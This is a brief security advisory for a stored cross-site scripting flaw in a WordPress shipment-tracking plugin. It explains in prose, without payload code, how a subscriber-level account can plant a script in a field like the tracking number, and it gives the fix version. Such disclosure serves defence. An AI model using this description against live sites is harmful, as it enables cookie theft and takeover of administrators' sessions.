CVE-2026-39540

Vulnerability

The Shipment Tracker for Woocommerce plugin for WordPress versions 1.5.3.2 and earlier contains a stored Cross Site Scripting (XSS) vulnerability. A subscriber-level user can inject malicious scripts through input fields that are not properly sanitized, leading to script execution in the context of other users' browsers [1].

Exploitation

An attacker needs a subscriber-level account on a WordPress site running the vulnerable plugin. The attacker crafts a malicious script and submits it via a vulnerable input field (e.g., shipment tracking number). The script is stored on the server and later executed when a privileged user (such as an admin) views the shipment details, or when visitors view the page. User interaction from the victim is required, such as viewing the infected page [1].

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the browsers of site visitors or administrators. This can be used to steal session cookies, redirect users to malicious sites, inject ads, or deface the website. The stored nature of the XSS amplifies the reach, affecting all visitors [1].

Mitigation

Update the plugin to version 1.5.3.3 or later, which fixes the vulnerability. If unable to update, Patchstack provides a mitigation rule to block attacks. Users can enable auto-updates for vulnerable plugins via Patchstack [1].